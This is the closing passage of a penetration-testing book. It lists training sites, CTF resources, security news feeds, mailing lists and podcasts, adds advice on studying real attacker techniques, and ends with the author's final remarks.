• Offensive Computer Security FSU:
http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/

• Pentesterlab: https://pentesterlab.com/exercises/

• Cybrary: http://www.cybrary.it/

• Open Security Training: http://opensecuritytraining.info/Training.html

• Coursera: https://www.coursera.org

• EdX: https://www.edx.org/


Capture The Flag (CTF) 


If you plan to make this your profession or even if you do this for fun, you really need to get involved 
with different CTF challenges. Try to find a few friends or maybe find your local security group to 
attempt these challenges. Not only will it test your skill and understanding of attacks, but you will 
also be able to better connect with other people in the industry. Spending three days and nights doing 
a challenge is probably one of the most rewarding experiences. 

Go visit https://ctftime.org and find out where and when the next CTFs are. If you are in the Orange 
County, CA area, stop by www.meetup.com/lethal and join one of our teams! 


Keeping Up To Date 


Here is a list of RSS feeds I monitor on a daily basis. I keep it small enough that I can quickly
look through it all in a matter of minutes:

• http://www.securepla.net/rss.php 


Mailing Lists 


• Seclists.org has taken over what used to be Full Disclosure. This is a vendor-neutral
forum for detailed discussion of vulnerabilities and exploitation techniques, as well as
tools, papers, news, and events of interest to the community.

o http://seclists.org/fulldisclosure/

• Dragon News Bytes - Great topics on everything such as privacy, tools, malware,
attacks, presentations, and more.

o https://www.team-cymru.org/News/dnb.html


Podcasts 













I have actually moved over to listening to podcasts versus just reading RSS feeds. Are you looking 
for bleeding-edge security issues being discussed by some of the best? Take a spin through some of 
these: 


• Brakeing Down Security - http://brakeingsecurity.blogspot.com/ 

• Risky Business - http://risky.biz/netcasts/risky-business 

• Security Now - https://www.grc.com/securitynow.htm 

• Security Weekly - https://securityweekly.com/podcasts/ 

• The Social-Engineer Podcast - http://www.social-engineer.org/category/podcast/ 

• Hak5 - https://itunes.apple.com/us/podcast/hak5-quicktime-large/id117137282?mt=2

• SecuraBit - https://itunes.apple.com/us/podcast/securabit/id280048405 


Learning From The Bad Guys 


When I teach my penetration testers, one of the most important things I tell them is to watch what the 
bad guys do. Not only does it help extend the attack process, but it also helps with lateral movement 
and learning what works in the real world. One of the main reasons my clients hire me is to emulate 
what the bad guys might do. If you are using theoretical attacks, this might not be as beneficial as 
using the tactics that their adversaries might try to do. 


Also, make sure you learn about your client’s industry. If their attacks use PDFs versus credential 
compromise, you might want to focus your attacks on those types. The more you can emulate their 
patterns, the better the company can protect themselves against their most immediate threats. 


Some Examples: 


Kerberos Golden Ticket Attacks and Sticky Keys

• http://blog.cobaltstrike.com/2015/01/07/pass-the-golden-ticket-with-wmic/

FireEye/Mandiant APT Tools and Techniques

• https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

CrowdStrike Blog

• http://blog.crowdstrike.com/

Verizon Data Breach Report

• http://www.verizonenterprise.com/DBIR/2014/reports/rp_Verizon-DBIR-2014_en_xg.pdf

Skeleton Key Attack

• http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/


For any good penetration tester, doing research should be half your time. Learning what the bad guys
do and being able to emulate them will be useful to your job, and even more useful to your client.



Final Notes 


Now, you have fully compromised the SUCK organization, cracked all the passwords, found all of 
their weakness, and made it out clean. It is time to take everything you learned and build on top of 
that. I have already recommended that you get involved with your local security groups and/or 
participate in security conferences. You can also start a blog and start playing with these different 
tools. Find out what works and what doesn’t and see how you can attack more efficiently and be 
silent on the network. It will take some time outside your normal 9-to-5 job, but it will definitely be 
worth it. 


I hope you have found the content in this book to be something of value and picked up some tips and 
tricks. I wrote this second book mainly because security is always changing and it is really important 
to stay on top of your game. As I have emphasized throughout this book and the prior one, there isn’t a 
point when you can say you have mastered security. However, once you have the basics down pat, the 
high-level attacks don’t really change. We see time and time again that old attacks come back and that 
you always need to be ready. 

If you did find this book to be helpful, please feel free to leave me a comment on the book’s website.
It will help me to continue developing better content and see what topics you would like to hear more
about. If I forgot to mention someone in this book or I misspoke on a topic, I apologize in advance
and will try my best to provide updated/corrected information on the book website.

Subscribe for Book Updates:

http://thehackerplaybook.com/subscribe

Twitter: @HackerPlaybook
URL: http://TheHackerPlaybook.com
Github: https://www.github.com/cheetz
Email: book@thehackerplaybook.com


*From the last book, I know that many of you downloaded copies of my book through less than legal
means. Although I don’t promote it, I am glad that I was able to share my knowledge and hope this
continues your interest in computer security. If you did happen to stumble on this copy somewhere on
the “internets” and did like my book, feel free to donate to the BTC address below. All proceeds will
go directly to LETHAL (http://www.meetup.com/lethal/) to promote the growth of our security
community.


Happy Hacking! 